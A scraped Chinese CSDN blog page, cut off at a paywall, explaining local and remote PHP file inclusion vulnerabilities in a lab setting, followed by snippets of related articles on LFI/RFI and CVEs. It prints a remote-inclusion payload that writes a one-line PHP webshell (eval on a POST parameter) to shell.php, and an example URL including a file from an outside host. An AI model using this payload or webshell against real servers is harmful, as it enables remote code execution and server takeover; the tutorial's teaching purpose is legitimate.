本地文件包含&远程文件包含漏洞复现

最新推荐文章于 2024-10-09 16:40:06 发布
最新推荐文章于 2024-10-09 16:40:06 发布
阅读量1.3k 收藏 1
点赞数
文章标签: sql 数据库 database web安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/121440903
版权
文件包含漏洞源于PHP的include和require等函数,当允许包含非PHP文件或远程文件时,可能导致恶意代码执行。本文介绍了本地文件包含和远程文件包含的概念,讲解了如何复现这两种漏洞,包括利用条件、函数搜索和绕过白名单的技巧,并提供了实际的POC示例。
摘要由CSDN通过智能技术生成

文件包含介绍
服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。这本身并不是漏洞,但是当其以其解析特性讲任意文件当成PHP解析,这时候漏洞就出来了,假如:我们上传一张包含木马的图片,按照它的特性当成PHP解析,这时候漏洞就产生了。感觉主要是其对解析和执行包含的文件未进行辨别和控制和严格过滤造成的。
文件包含分为本地文件包含和远程文件包含;本地文件时包含本地服务器的文件,比如:你上传文件到它服务器,它进行包含和执行,如果文件存在恶意代码它同样会当成PHP进行执行,而远程文件包含可以通过http包含别的地址非本地的文件,如:包含别的服务器的文件进行包含执行。
远程包含如:
<?fputs(fopen(“shell.php”,”w”),”<?php eval($_POST[xxx]);?>”)?>
远程包含如http://192.168.199.110/fileincl/example2.php?page=http://www.xxx.com/xxx.txt
此时在服务器根目录下就会生成shell.php文件,内容为一句话木马
<?php eval($_POST[xxx]);?>
远程文件包含需要PHPstudy的phpini文件中是allow_url_fopen是打开状态,远程文件包含才能用,&

最低0.47元/天 解锁文章
无名安全
关注
31-3 文件包含漏洞 - 文件包含漏洞利用(CVE-2021-3019:Lanproxy 任意文件读取漏洞复现
weixin_43263566的博客
03-27 509
关于 Lanproxy: Lanproxy 是一款用于实现内网穿透的工具,可以将局域网中的个人电脑或服务器代理到公网上。它支持 TCP 流量转发,并且兼容各种 TCP 上层协议,比如访问内网网站、本地支付接口调试、SSH 访问和远程桌面等功能。
[漏洞复现]Tomcat AJP 文件包含漏洞
weixin_44532761的博客
09-21 939
以Tomcat为例,Tomcat本身可以不作为Servlet容器使用,仅仅充当Web服务器的角色,但是其处理静态资源请求的效率和速度远不及Apache,所以很多情况下生产环境会将Apache作为Web服务器来接收用户的请求。浏览器无法使用AJP,而是首先由Apache与Tomcat进行AJP的通信,然后由Apache通过proxy_ajp模块进行反向代理,将其转换成HTTP服务器再暴露给用户,允许用户进行访问。这样做的原因是,相对于HTTP纯文本协议来说,效率和性能更高,同时也做了很多优化。
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1695
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
文件包含漏洞之本地包含和远程包含
weixin_34392906的博客
08-23 526
文件包含漏洞介绍:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP...
dvwa:文件包含、文件上传
最新发布
anddddoooo的博客
10-09 982
上面的逻辑是,如果参数没有file字符串,且不是include.php,直接过滤,所以这个情况不能使用远程文件包含了。本地文件包含不用什么测试环境,只要有个文件,就能知道其是否触发,远程文件包含需要我们写个php代码,如下。上传的文件会成为md5值.png或md5值.jpg的形式,web服务器不会将其解析为php文件。本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等。文件,而文件内容如下:<?../../../../../../test.txt能将文件读出。
文件包含漏洞复现
ABUG
09-22 788
文件包含攻击是一种利用Web应用程序的文件包含功能来执行任意文件的攻击方式。通过漏洞,攻击者可以读取敏感文件、执行恶意代码,甚至完全控制目标服务器。防御这种攻击的关键在于。
PHP文件包含漏洞复现
春日野穹
09-17 3101
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
phpmyadmin文件包含漏洞复现(CVE-2018-12613)
feng的博客
05-04 1191
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。 复现 漏洞出现在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
远程文件包含漏洞(dedecms5.7 sp1版本漏洞复现
kid的博客
06-05 6091
远程文件包含漏洞(dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
文件包含漏洞通常发生在Web应用处理用户输入时,没有正确地过滤或验证输入,导致程序错误地包含了恶意用户提供的远程或本地文件路径。在Apache Tomcat 的情况下,这个漏洞与Tomcat的`ServerPages (JSP)`和`Java...
DVWA之文件包含漏洞复现
weixin_43263451的博客
07-20 1788
文件包含漏洞基本原理程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。...
文件包含漏洞漏洞复现
来日可期的博客
08-31 2546
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web安全漏洞,它允许攻击者通过构造恶意请求,将恶意代码或者非授权文件包含到应用程序中执行。
php文件包含漏洞复现
dbabs的博客
03-06 471
访问http://192.168.74.136:8080/lfi.php?file=/etc/passwd,确定存在文件包含漏洞。这时就可以利用文件包含漏洞进行任意命令执行。使用python脚本实现文件包含漏洞利用。
PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)
hclimg的博客
10-30 2329
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞复现环境:基于某平台的在线靶场进行漏洞复现 复现过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 3268
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
本地文件包含远程文件包含漏洞
weixin_41554088的博客
05-04 1904
总结一下 1.文件包含漏洞分两种:LFI(local file include)本地文件包含 和 RFI(remote file include)远程文件包含 2.文件包含常用到的函数:include() 和 require() 3.特性:文件包含读取文件内容后,会将其当做php执行,所以在文件包含时,后缀是什么已经不重要了 4.RFI需要满足满足三个条件:1.需要allow_url_include=On(默认为off) 2.你的木马不存在目标主机上 3.要包含的远程地址一般都是txt 这里拿ph
Apache Tomcat文件包含漏洞复现(详细教程)
weixin_60838266的博客
07-18 3027
Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1162
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值